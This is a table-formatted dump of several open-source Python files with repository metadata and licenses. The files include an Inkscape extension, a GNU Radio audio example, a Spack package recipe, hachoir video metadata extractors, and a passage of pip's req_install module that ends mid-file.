repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
tik0/inkscapeGrid | share/extensions/previous_glyph_layer.py | 6 | 1479 | #!/usr/bin/env python
'''
Copyright (C) 2011 Felipe Correa da Silva Sanches
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
'''
import inkex
class PreviousLayer(inkex.Effect):
def __init__(self):
inkex.Effect.__init__(self)
def effect(self):
# Get access to main SVG document element
self.svg = self.document.getroot()
groups = self.svg.findall(inkex.addNS('g', 'svg'))
count=0
glyphs=[]
for g in groups:
if "GlyphLayer-" in g.get(inkex.addNS('label', 'inkscape')):
glyphs.append(g)
if g.get("style")=="display:inline":
count+=1
current = len(glyphs)-1
if count!=1 or len(glyphs)<2:
return
#TODO: inform the user?
glyphs[current].set("style", "display:none")
glyphs[current-1].set("style", "display:inline")
return
#TODO: loop
if __name__ == '__main__':
e = PreviousLayer()
e.affect()
| gpl-2.0 |
sharbison3/python-docs-samples | appengine/flexible/django_cloudsql/mysite/urls.py | 8 | 1069 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns = [url(r'^', include('polls.urls')),
url(r'^admin/', admin.site.urls)]
# This enables static files to be served from the Gunicorn server
# In Production, serve static files from Google Cloud Storage or an alternative
# CDN
if settings.DEBUG:
urlpatterns += staticfiles_urlpatterns()
| apache-2.0 |
alfayez/gnuradio | gr-audio/examples/python/spectrum_inversion.py | 10 | 2422 | #!/usr/bin/env python
#
# Copyright 2004,2005,2007 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
# Gang - Here's a simple script that demonstrates spectrum inversion
# using the multiply by [1,-1] method (mixing with Nyquist frequency).
# Requires nothing but a sound card, and sounds just like listening
# to a SSB signal on the wrong sideband.
#
from gnuradio import gr
from gnuradio import audio
from gnuradio.eng_option import eng_option
from optparse import OptionParser
class my_top_block(gr.top_block):
def __init__(self):
gr.top_block.__init__(self)
parser = OptionParser(option_class=eng_option)
parser.add_option("-I", "--audio-input", type="string", default="",
help="pcm input device name. E.g., hw:0,0 or /dev/dsp")
parser.add_option("-O", "--audio-output", type="string", default="",
help="pcm output device name. E.g., hw:0,0 or /dev/dsp")
parser.add_option("-r", "--sample-rate", type="eng_float", default=8000,
help="set sample rate to RATE (8000)")
(options, args) = parser.parse_args ()
if len(args) != 0:
parser.print_help()
raise SystemExit, 1
sample_rate = int(options.sample_rate)
src = audio.source (sample_rate, options.audio_input)
dst = audio.sink (sample_rate, options.audio_output)
vec1 = [1, -1]
vsource = gr.vector_source_f(vec1, True)
multiply = gr.multiply_ff()
self.connect(src, (multiply, 0))
self.connect(vsource, (multiply, 1))
self.connect(multiply, dst)
if __name__ == '__main__':
try:
my_top_block().run()
except KeyboardInterrupt:
pass
| gpl-3.0 |
tmerrick1/spack | var/spack/repos/builtin/packages/sniffles/package.py | 5 | 1968 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Sniffles(CMakePackage):
"""Structural variation caller using third generation sequencing."""
homepage = "https://github.com/fritzsedlazeck/Sniffles/wiki"
url = "https://github.com/fritzsedlazeck/Sniffles/archive/v1.0.5.tar.gz"
version('1.0.7', '83bd93c5ab5dad3a6dc776f11d3a880e')
version('1.0.5', 'c2f2350d00418ba4d82c074e7f0b1832')
# the build process doesn't actually install anything, do it by hand
def install(self, spec, prefix):
mkdir(prefix.bin)
src = "bin/sniffles-core-{0}".format(spec.version.dotted)
binaries = ['sniffles', 'sniffles-debug']
for b in binaries:
install(join_path(src, b), join_path(prefix.bin, b))
| lgpl-2.1 |
AICP/external_chromium_org | native_client_sdk/src/build_tools/tests/test_server.py | 170 | 2165 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import multiprocessing
import os
import SimpleHTTPServer
class LocalHTTPServer(object):
"""Class to start a local HTTP server as a child process."""
def __init__(self, serve_dir):
parent_conn, child_conn = multiprocessing.Pipe()
self.process = multiprocessing.Process(target=_HTTPServerProcess,
args=(child_conn, serve_dir))
self.process.start()
if parent_conn.poll(10): # wait 10 seconds
self.port = parent_conn.recv()
else:
raise Exception('Unable to launch HTTP server.')
self.conn = parent_conn
def Shutdown(self):
"""Send a message to the child HTTP server process and wait for it to
finish."""
self.conn.send(False)
self.process.join()
def GetURL(self, rel_url):
"""Get the full url for a file on the local HTTP server.
Args:
rel_url: A URL fragment to convert to a full URL. For example,
GetURL('foobar.baz') -> 'http://localhost:1234/foobar.baz'
"""
return 'http://localhost:%d/%s' % (self.port, rel_url)
class QuietHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def log_message(self, msg_format, *args):
pass
def _HTTPServerProcess(conn, serve_dir):
"""Run a local httpserver with a randomly-chosen port.
This function assumes it is run as a child process using multiprocessing.
Args:
conn: A connection to the parent process. The child process sends
the local port, and waits for a message from the parent to
stop serving.
serve_dir: The directory to serve. All files are accessible through
http://localhost:<port>/path/to/filename.
"""
import BaseHTTPServer
os.chdir(serve_dir)
httpd = BaseHTTPServer.HTTPServer(('', 0), QuietHTTPRequestHandler)
conn.send(httpd.server_address[1]) # the chosen port number
httpd.timeout = 0.5 # seconds
running = True
while running:
httpd.handle_request()
if conn.poll():
running = conn.recv()
conn.close()
| bsd-3-clause |
Mirantis/solar | solar/dblayer/gevent_patches.py | 3 | 1348 | # Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
def _patch(obj, name, target):
orig = getattr(obj, name)
setattr(obj, '_orig_%s' % name, orig)
setattr(obj, name, target)
def patch_all():
from solar.dblayer.model import ModelMeta
if ModelMeta._defined_models:
raise RuntimeError(
"You should run patch_multi_get before defining models")
from solar.dblayer.model import Model
from solar.dblayer.gevent_helpers import get_local
from solar.dblayer.gevent_helpers import multi_get
from solar.dblayer.gevent_helpers import solar_map
from solar import utils
_patch(Model, 'multi_get', multi_get)
_patch(utils, 'solar_map', solar_map)
_patch(utils, 'get_local', get_local)
_patch(Model, '_local', get_local()())
| apache-2.0 |
b0ttl3z/SickRage | lib/hachoir_metadata/video.py | 57 | 15504 | from hachoir_core.field import MissingField
from hachoir_metadata.metadata import (registerExtractor,
Metadata, RootMetadata, MultipleMetadata)
from hachoir_metadata.metadata_item import QUALITY_GOOD
from hachoir_metadata.safe import fault_tolerant
from hachoir_parser.video import MovFile, AsfFile, FlvFile
from hachoir_parser.video.asf import Descriptor as ASF_Descriptor
from hachoir_parser.container import MkvFile
from hachoir_parser.container.mkv import dateToDatetime
from hachoir_core.i18n import _
from hachoir_core.tools import makeUnicode, makePrintable, timedelta2seconds
from datetime import timedelta
class MkvMetadata(MultipleMetadata):
tag_key = {
"TITLE": "title",
"URL": "url",
"COPYRIGHT": "copyright",
# TODO: use maybe another name?
# Its value may be different than (...)/Info/DateUTC/date
"DATE_RECORDED": "creation_date",
# TODO: Extract subtitle metadata
"SUBTITLE": "subtitle_author",
}
def extract(self, mkv):
for segment in mkv.array("Segment"):
self.processSegment(segment)
def processSegment(self, segment):
for field in segment:
if field.name.startswith("Info["):
self.processInfo(field)
elif field.name.startswith("Tags["):
for tag in field.array("Tag"):
self.processTag(tag)
elif field.name.startswith("Tracks["):
self.processTracks(field)
elif field.name.startswith("Cluster["):
if self.quality < QUALITY_GOOD:
return
def processTracks(self, tracks):
for entry in tracks.array("TrackEntry"):
self.processTrack(entry)
def processTrack(self, track):
if "TrackType/enum" not in track:
return
if track["TrackType/enum"].display == "video":
self.processVideo(track)
elif track["TrackType/enum"].display == "audio":
self.processAudio(track)
elif track["TrackType/enum"].display == "subtitle":
self.processSubtitle(track)
def trackCommon(self, track, meta):
if "Name/unicode" in track:
meta.title = track["Name/unicode"].value
if "Language/string" in track:
meta.language = track["Language/string"].value
else:
meta.language = "eng"
def processVideo(self, track):
video = Metadata(self)
self.trackCommon(track, video)
try:
video.compression = track["CodecID/string"].value
if "Video" in track:
video.width = track["Video/PixelWidth/unsigned"].value
video.height = track["Video/PixelHeight/unsigned"].value
except MissingField:
pass
self.addGroup("video[]", video, "Video stream")
def getDouble(self, field, parent):
float_key = '%s/float' % parent
if float_key in field:
return field[float_key].value
double_key = '%s/double' % parent
if double_key in field:
return field[double_key].value
return None
def processAudio(self, track):
audio = Metadata(self)
self.trackCommon(track, audio)
if "Audio" in track:
frequency = self.getDouble(track, "Audio/SamplingFrequency")
if frequency is not None:
audio.sample_rate = frequency
if "Audio/Channels/unsigned" in track:
audio.nb_channel = track["Audio/Channels/unsigned"].value
if "Audio/BitDepth/unsigned" in track:
audio.bits_per_sample = track["Audio/BitDepth/unsigned"].value
if "CodecID/string" in track:
audio.compression = track["CodecID/string"].value
self.addGroup("audio[]", audio, "Audio stream")
def processSubtitle(self, track):
sub = Metadata(self)
self.trackCommon(track, sub)
try:
sub.compression = track["CodecID/string"].value
except MissingField:
pass
self.addGroup("subtitle[]", sub, "Subtitle")
def processTag(self, tag):
for field in tag.array("SimpleTag"):
self.processSimpleTag(field)
def processSimpleTag(self, tag):
if "TagName/unicode" not in tag \
or "TagString/unicode" not in tag:
return
name = tag["TagName/unicode"].value
if name not in self.tag_key:
return
key = self.tag_key[name]
value = tag["TagString/unicode"].value
setattr(self, key, value)
def processInfo(self, info):
if "TimecodeScale/unsigned" in info:
duration = self.getDouble(info, "Duration")
if duration is not None:
try:
seconds = duration * info["TimecodeScale/unsigned"].value * 1e-9
self.duration = timedelta(seconds=seconds)
except OverflowError:
# Catch OverflowError for timedelta (long int too large
# to be converted to an int)
pass
if "DateUTC/date" in info:
try:
self.creation_date = dateToDatetime(info["DateUTC/date"].value)
except OverflowError:
pass
if "WritingApp/unicode" in info:
self.producer = info["WritingApp/unicode"].value
if "MuxingApp/unicode" in info:
self.producer = info["MuxingApp/unicode"].value
if "Title/unicode" in info:
self.title = info["Title/unicode"].value
class FlvMetadata(MultipleMetadata):
def extract(self, flv):
if "video[0]" in flv:
meta = Metadata(self)
self.extractVideo(flv["video[0]"], meta)
self.addGroup("video", meta, "Video stream")
if "audio[0]" in flv:
meta = Metadata(self)
self.extractAudio(flv["audio[0]"], meta)
self.addGroup("audio", meta, "Audio stream")
# TODO: Computer duration
# One technic: use last video/audio chunk and use timestamp
# But this is very slow
self.format_version = flv.description
if "metadata/entry[1]" in flv:
self.extractAMF(flv["metadata/entry[1]"])
if self.has('duration'):
self.bit_rate = flv.size / timedelta2seconds(self.get('duration'))
@fault_tolerant
def extractAudio(self, audio, meta):
if audio["codec"].display == "MP3" and "music_data" in audio:
meta.compression = audio["music_data"].description
else:
meta.compression = audio["codec"].display
meta.sample_rate = audio.getSampleRate()
if audio["is_16bit"].value:
meta.bits_per_sample = 16
else:
meta.bits_per_sample = 8
if audio["is_stereo"].value:
meta.nb_channel = 2
else:
meta.nb_channel = 1
@fault_tolerant
def extractVideo(self, video, meta):
meta.compression = video["codec"].display
def extractAMF(self, amf):
for entry in amf.array("item"):
self.useAmfEntry(entry)
@fault_tolerant
def useAmfEntry(self, entry):
key = entry["key"].value
if key == "duration":
self.duration = timedelta(seconds=entry["value"].value)
elif key == "creator":
self.producer = entry["value"].value
elif key == "audiosamplerate":
self.sample_rate = entry["value"].value
elif key == "framerate":
self.frame_rate = entry["value"].value
elif key == "metadatacreator":
self.producer = entry["value"].value
elif key == "metadatadate":
self.creation_date = entry.value
elif key == "width":
self.width = int(entry["value"].value)
elif key == "height":
self.height = int(entry["value"].value)
class MovMetadata(RootMetadata):
def extract(self, mov):
for atom in mov:
if "movie" in atom:
self.processMovie(atom["movie"])
@fault_tolerant
def processMovieHeader(self, hdr):
self.creation_date = hdr["creation_date"].value
self.last_modification = hdr["lastmod_date"].value
self.duration = timedelta(seconds=float(hdr["duration"].value) / hdr["time_scale"].value)
self.comment = _("Play speed: %.1f%%") % (hdr["play_speed"].value*100)
self.comment = _("User volume: %.1f%%") % (float(hdr["volume"].value)*100)
@fault_tolerant
def processTrackHeader(self, hdr):
width = int(hdr["frame_size_width"].value)
height = int(hdr["frame_size_height"].value)
if width and height:
self.width = width
self.height = height
def processTrack(self, atom):
for field in atom:
if "track_hdr" in field:
self.processTrackHeader(field["track_hdr"])
def processMovie(self, atom):
for field in atom:
if "track" in field:
self.processTrack(field["track"])
if "movie_hdr" in field:
self.processMovieHeader(field["movie_hdr"])
class AsfMetadata(MultipleMetadata):
EXT_DESC_TO_ATTR = {
"Encoder": "producer",
"ToolName": "producer",
"AlbumTitle": "album",
"Track": "track_number",
"TrackNumber": "track_total",
"Year": "creation_date",
"AlbumArtist": "author",
}
SKIP_EXT_DESC = set((
# Useless informations
"WMFSDKNeeded", "WMFSDKVersion",
"Buffer Average", "VBR Peak", "EncodingTime",
"MediaPrimaryClassID", "UniqueFileIdentifier",
))
def extract(self, asf):
if "header/content" in asf:
self.processHeader(asf["header/content"])
def processHeader(self, header):
compression = []
is_vbr = None
if "ext_desc/content" in header:
# Extract all data from ext_desc
data = {}
for desc in header.array("ext_desc/content/descriptor"):
self.useExtDescItem(desc, data)
# Have ToolName and ToolVersion? If yes, group them to producer key
if "ToolName" in data and "ToolVersion" in data:
self.producer = "%s (version %s)" % (data["ToolName"], data["ToolVersion"])
del data["ToolName"]
del data["ToolVersion"]
# "IsVBR" key
if "IsVBR" in data:
is_vbr = (data["IsVBR"] == 1)
del data["IsVBR"]
# Store data
for key, value in data.iteritems():
if key in self.EXT_DESC_TO_ATTR:
key = self.EXT_DESC_TO_ATTR[key]
else:
if isinstance(key, str):
key = makePrintable(key, "ISO-8859-1", to_unicode=True)
value = "%s=%s" % (key, value)
key = "comment"
setattr(self, key, value)
if "file_prop/content" in header:
self.useFileProp(header["file_prop/content"], is_vbr)
if "codec_list/content" in header:
for codec in header.array("codec_list/content/codec"):
if "name" in codec:
text = codec["name"].value
if "desc" in codec and codec["desc"].value:
text = "%s (%s)" % (text, codec["desc"].value)
compression.append(text)
audio_index = 1
video_index = 1
for index, stream_prop in enumerate(header.array("stream_prop")):
if "content/audio_header" in stream_prop:
meta = Metadata(self)
self.streamProperty(header, index, meta)
self.streamAudioHeader(stream_prop["content/audio_header"], meta)
if self.addGroup("audio[%u]" % audio_index, meta, "Audio stream #%u" % audio_index):
audio_index += 1
elif "content/video_header" in stream_prop:
meta = Metadata(self)
self.streamProperty(header, index, meta)
self.streamVideoHeader(stream_prop["content/video_header"], meta)
if self.addGroup("video[%u]" % video_index, meta, "Video stream #%u" % video_index):
video_index += 1
if "metadata/content" in header:
info = header["metadata/content"]
try:
self.title = info["title"].value
self.author = info["author"].value
self.copyright = info["copyright"].value
except MissingField:
pass
@fault_tolerant
def streamAudioHeader(self, audio, meta):
if not meta.has("compression"):
meta.compression = audio["twocc"].display
meta.nb_channel = audio["channels"].value
meta.sample_rate = audio["sample_rate"].value
meta.bits_per_sample = audio["bits_per_sample"].value
@fault_tolerant
def streamVideoHeader(self, video, meta):
meta.width = video["width"].value
meta.height = video["height"].value
if "bmp_info" in video:
bmp_info = video["bmp_info"]
if not meta.has("compression"):
meta.compression = bmp_info["codec"].display
meta.bits_per_pixel = bmp_info["bpp"].value
@fault_tolerant
def useExtDescItem(self, desc, data):
if desc["type"].value == ASF_Descriptor.TYPE_BYTE_ARRAY:
# Skip binary data
return
key = desc["name"].value
if "/" in key:
# Replace "WM/ToolName" with "ToolName"
key = key.split("/", 1)[1]
if key in self.SKIP_EXT_DESC:
# Skip some keys
return
value = desc["value"].value
if not value:
return
value = makeUnicode(value)
data[key] = value
@fault_tolerant
def useFileProp(self, prop, is_vbr):
self.creation_date = prop["creation_date"].value
self.duration = prop["play_duration"].value
if prop["seekable"].value:
self.comment = u"Is seekable"
value = prop["max_bitrate"].value
text = prop["max_bitrate"].display
if is_vbr is True:
text = "VBR (%s max)" % text
elif is_vbr is False:
text = "%s (CBR)" % text
else:
text = "%s (max)" % text
self.bit_rate = (value, text)
def streamProperty(self, header, index, meta):
key = "bit_rates/content/bit_rate[%u]/avg_bitrate" % index
if key in header:
meta.bit_rate = header[key].value
# TODO: Use codec list
# It doesn't work when the video uses /header/content/bitrate_mutex
# since the codec list are shared between streams but... how is it
# shared?
# key = "codec_list/content/codec[%u]" % index
# if key in header:
# codec = header[key]
# if "name" in codec:
# text = codec["name"].value
# if "desc" in codec and codec["desc"].value:
# meta.compression = "%s (%s)" % (text, codec["desc"].value)
# else:
# meta.compression = text
registerExtractor(MovFile, MovMetadata)
registerExtractor(AsfFile, AsfMetadata)
registerExtractor(FlvFile, FlvMetadata)
registerExtractor(MkvFile, MkvMetadata)
| gpl-3.0 |
guildai/guild | guild/external/pip/_internal/req/req_install.py | 8 | 43743 | from __future__ import absolute_import
import io
import logging
import os
import re
import shutil
import sys
import sysconfig
import traceback
import zipfile
from distutils.util import change_root
from email.parser import FeedParser # type: ignore
from pip._vendor import pkg_resources, pytoml, six
from pip._vendor.packaging import specifiers
from pip._vendor.packaging.markers import Marker
from pip._vendor.packaging.requirements import InvalidRequirement, Requirement
from pip._vendor.packaging.utils import canonicalize_name
from pip._vendor.packaging.version import Version
from pip._vendor.packaging.version import parse as parse_version
from pip._vendor.pkg_resources import RequirementParseError, parse_requirements
from pip._internal import wheel
from pip._internal.build_env import NoOpBuildEnvironment
from pip._internal.compat import native_str
from pip._internal.download import (
is_archive_file, is_url, path_to_url, url_to_path,
)
from pip._internal.exceptions import InstallationError
from pip._internal.locations import (
PIP_DELETE_MARKER_FILENAME, running_under_virtualenv,
)
from pip._internal.req.req_uninstall import UninstallPathSet
from pip._internal.utils.hashes import Hashes
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import (
_make_build_dir, ask_path_exists, backup_dir, call_subprocess,
display_path, dist_in_site_packages, dist_in_usersite, ensure_dir,
get_installed_version, is_installable_dir, read_text_file, rmtree,
)
from pip._internal.utils.setuptools_build import SETUPTOOLS_SHIM
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.utils.ui import open_spinner
from pip._internal.vcs import vcs
from pip._internal.wheel import Wheel, move_wheel_files
logger = logging.getLogger(__name__)
operators = specifiers.Specifier._operators.keys()
def _strip_extras(path):
m = re.match(r'^(.+)(\[[^\]]+\])$', path)
extras = None
if m:
path_no_extras = m.group(1)
extras = m.group(2)
else:
path_no_extras = path
return path_no_extras, extras
class InstallRequirement(object):
"""
Represents something that may be installed later on, may have information
about where to fetch the relavant requirement and also contains logic for
installing the said requirement.
"""
def __init__(self, req, comes_from, source_dir=None, editable=False,
link=None, update=True, markers=None,
isolated=False, options=None, wheel_cache=None,
constraint=False, extras=()):
assert req is None or isinstance(req, Requirement), req
self.req = req
self.comes_from = comes_from
self.constraint = constraint
if source_dir is not None:
self.source_dir = os.path.normpath(os.path.abspath(source_dir))
else:
self.source_dir = None
self.editable = editable
self._wheel_cache = wheel_cache
if link is not None:
self.link = self.original_link = link
else:
from pip._internal.index import Link
self.link = self.original_link = req and req.url and Link(req.url)
if extras:
self.extras = extras
elif req:
self.extras = {
pkg_resources.safe_extra(extra) for extra in req.extras
}
else:
self.extras = set()
if markers is not None:
self.markers = markers
else:
self.markers = req and req.marker
self._egg_info_path = None
# This holds the pkg_resources.Distribution object if this requirement
# is already available:
self.satisfied_by = None
# This hold the pkg_resources.Distribution object if this requirement
# conflicts with another installed distribution:
self.conflicts_with = None
# Temporary build location
self._temp_build_dir = TempDirectory(kind="req-build")
# Used to store the global directory where the _temp_build_dir should
# have been created. Cf _correct_build_location method.
self._ideal_build_dir = None
# True if the editable should be updated:
self.update = update
# Set to True after successful installation
self.install_succeeded = None
# UninstallPathSet of uninstalled distribution (for possible rollback)
self.uninstalled_pathset = None
self.options = options if options else {}
# Set to True after successful preparation of this requirement
self.prepared = False
self.is_direct = False
self.isolated = isolated
self.build_env = NoOpBuildEnvironment()
# Constructors
# TODO: Move these out of this class into custom methods.
@classmethod
def from_editable(cls, editable_req, comes_from=None, isolated=False,
options=None, wheel_cache=None, constraint=False):
from pip._internal.index import Link
name, url, extras_override = parse_editable(editable_req)
if url.startswith('file:'):
source_dir = url_to_path(url)
else:
source_dir = None
if name is not None:
try:
req = Requirement(name)
except InvalidRequirement:
raise InstallationError("Invalid requirement: '%s'" % name)
else:
req = None
return cls(
req, comes_from, source_dir=source_dir,
editable=True,
link=Link(url),
constraint=constraint,
isolated=isolated,
options=options if options else {},
wheel_cache=wheel_cache,
extras=extras_override or (),
)
@classmethod
def from_req(cls, req, comes_from=None, isolated=False, wheel_cache=None):
try:
req = Requirement(req)
except InvalidRequirement:
raise InstallationError("Invalid requirement: '%s'" % req)
if req.url:
raise InstallationError(
"Direct url requirement (like %s) are not allowed for "
"dependencies" % req
)
return cls(req, comes_from, isolated=isolated, wheel_cache=wheel_cache)
@classmethod
def from_line(
cls, name, comes_from=None, isolated=False, options=None,
wheel_cache=None, constraint=False):
"""Creates an InstallRequirement from a name, which might be a
requirement, directory containing 'setup.py', filename, or URL.
"""
from pip._internal.index import Link
if is_url(name):
marker_sep = '; '
else:
marker_sep = ';'
if marker_sep in name:
name, markers = name.split(marker_sep, 1)
markers = markers.strip()
if not markers:
markers = None
else:
markers = Marker(markers)
else:
markers = None
name = name.strip()
req = None
path = os.path.normpath(os.path.abspath(name))
link = None
extras = None
if is_url(name):
link = Link(name)
else:
p, extras = _strip_extras(path)
looks_like_dir = os.path.isdir(p) and (
os.path.sep in name or
(os.path.altsep is not None and os.path.altsep in name) or
name.startswith('.')
)
if looks_like_dir:
if not is_installable_dir(p):
raise InstallationError(
"Directory %r is not installable. File 'setup.py' "
"not found." % name
)
link = Link(path_to_url(p))
elif is_archive_file(p):
if not os.path.isfile(p):
logger.warning(
'Requirement %r looks like a filename, but the '
'file does not exist',
name
)
link = Link(path_to_url(p))
# it's a local file, dir, or url
if link:
# Handle relative file URLs
if link.scheme == 'file' and re.search(r'\.\./', link.url):
link = Link(
path_to_url(os.path.normpath(os.path.abspath(link.path))))
# wheel file
if link.is_wheel:
wheel = Wheel(link.filename) # can raise InvalidWheelFilename
req = "%s==%s" % (wheel.name, wheel.version)
else:
# set the req to the egg fragment. when it's not there, this
# will become an 'unnamed' requirement
req = link.egg_fragment
# a requirement specifier
else:
req = name
if extras:
extras = Requirement("placeholder" + extras.lower()).extras
else:
extras = ()
if req is not None:
try:
req = Requirement(req)
except InvalidRequirement:
if os.path.sep in req:
add_msg = "It looks like a path."
add_msg += deduce_helpful_msg(req)
elif '=' in req and not any(op in req for op in operators):
add_msg = "= is not a valid operator. Did you mean == ?"
else:
add_msg = traceback.format_exc()
raise InstallationError(
"Invalid requirement: '%s'\n%s" % (req, add_msg))
return cls(
req, comes_from, link=link, markers=markers,
isolated=isolated,
options=options if options else {},
wheel_cache=wheel_cache,
constraint=constraint,
extras=extras,
)
def __str__(self):
if self.req:
s = str(self.req)
if self.link:
s += ' from %s' % self.link.url
else:
s = self.link.url if self.link else None
if self.satisfied_by is not None:
s += ' in %s' % display_path(self.satisfied_by.location)
if self.comes_from:
if isinstance(self.comes_from, six.string_types):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
if comes_from:
s += ' (from %s)' % comes_from
return s
def __repr__(self):
return '<%s object: %s editable=%r>' % (
self.__class__.__name__, str(self), self.editable)
def populate_link(self, finder, upgrade, require_hashes):
"""Ensure that if a link can be found for this, that it is found.
Note that self.link may still be None - if Upgrade is False and the
requirement is already installed.
If require_hashes is True, don't use the wheel cache, because cached
wheels, always built locally, have different hashes than the files
downloaded from the index server and thus throw false hash mismatches.
Furthermore, cached wheels at present have undeterministic contents due
to file modification times.
"""
if self.link is None:
self.link = finder.find_requirement(self, upgrade)
if self._wheel_cache is not None and not require_hashes:
old_link = self.link
self.link = self._wheel_cache.get(self.link, self.name)
if old_link != self.link:
logger.debug('Using cached wheel link: %s', self.link)
# Things that are valid for all kinds of requirements?
@property
def name(self):
if self.req is None:
return None
return native_str(pkg_resources.safe_name(self.req.name))
@property
def specifier(self):
return self.req.specifier
@property
def is_pinned(self):
"""Return whether I am pinned to an exact version.
For example, some-package==1.2 is pinned; some-package>1.2 is not.
"""
specifiers = self.specifier
return (len(specifiers) == 1 and
next(iter(specifiers)).operator in {'==', '==='})
@property
def installed_version(self):
return get_installed_version(self.name)
def match_markers(self, extras_requested=None):
if not extras_requested:
# Provide an extra to safely evaluate the markers
# without matching any extra
extras_requested = ('',)
if self.markers is not None:
return any(
self.markers.evaluate({'extra': extra})
for extra in extras_requested)
else:
return True
@property
def has_hash_options(self):
"""Return whether any known-good hashes are specified as options.
These activate --require-hashes mode; hashes specified as part of a
URL do not.
"""
return bool(self.options.get('hashes', {}))
def hashes(self, trust_internet=True):
"""Return a hash-comparer that considers my option- and URL-based
hashes to be known-good.
Hashes in URLs--ones embedded in the requirements file, not ones
downloaded from an index server--are almost peers with ones from
flags. They satisfy --require-hashes (whether it was implicitly or
explicitly activated) but do not activate it. md5 and sha224 are not
allowed in flags, which should nudge people toward good algos. We
always OR all hashes together, even ones from URLs.
:param trust_internet: Whether to trust URL-based (#md5=...) hashes
downloaded from the internet, as by populate_link()
"""
good_hashes = self.options.get('hashes', {}).copy()
link = self.link if trust_internet else self.original_link
if link and link.hash:
good_hashes.setdefault(link.hash_name, []).append(link.hash)
return Hashes(good_hashes)
def from_path(self):
"""Format a nice indicator to show where this "comes from"
"""
if self.req is None:
return None
s = str(self.req)
if self.comes_from:
if isinstance(self.comes_from, six.string_types):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
if comes_from:
s += '->' + comes_from
return s
def build_location(self, build_dir):
assert build_dir is not None
if self._temp_build_dir.path is not None:
return self._temp_build_dir.path
if self.req is None:
# for requirement via a path to a directory: the name of the
# package is not available yet so we create a temp directory
# Once run_egg_info will have run, we'll be able
# to fix it via _correct_build_location
# Some systems have /tmp as a symlink which confuses custom
# builds (such as numpy). Thus, we ensure that the real path
# is returned.
self._temp_build_dir.create()
self._ideal_build_dir = build_dir
return self._temp_build_dir.path
if self.editable:
name = self.name.lower()
else:
name = self.name
# FIXME: Is there a better place to create the build_dir? (hg and bzr
# need this)
if not os.path.exists(build_dir):
logger.debug('Creating directory %s', build_dir)
_make_build_dir(build_dir)
return os.path.join(build_dir, name)
def _correct_build_location(self):
"""Move self._temp_build_dir to self._ideal_build_dir/self.req.name
For some requirements (e.g. a path to a directory), the name of the
package is not available until we run egg_info, so the build_location
will return a temporary directory and store the _ideal_build_dir.
This is only called by self.egg_info_path to fix the temporary build
directory.
"""
if self.source_dir is not None:
return
assert self.req is not None
assert self._temp_build_dir.path
assert self._ideal_build_dir.path
old_location = self._temp_build_dir.path
self._temp_build_dir.path = None
new_location = self.build_location(self._ideal_build_dir)
if os.path.exists(new_location):
raise InstallationError(
'A package already exists in %s; please remove it to continue'
% display_path(new_location))
logger.debug(
'Moving package %s from %s to new location %s',
self, display_path(old_location), display_path(new_location),
)
shutil.move(old_location, new_location)
self._temp_build_dir.path = new_location
self._ideal_build_dir = None
self.source_dir = os.path.normpath(os.path.abspath(new_location))
self._egg_info_path = None
def remove_temporary_source(self):
"""Remove the source files from this requirement, if they are marked
for deletion"""
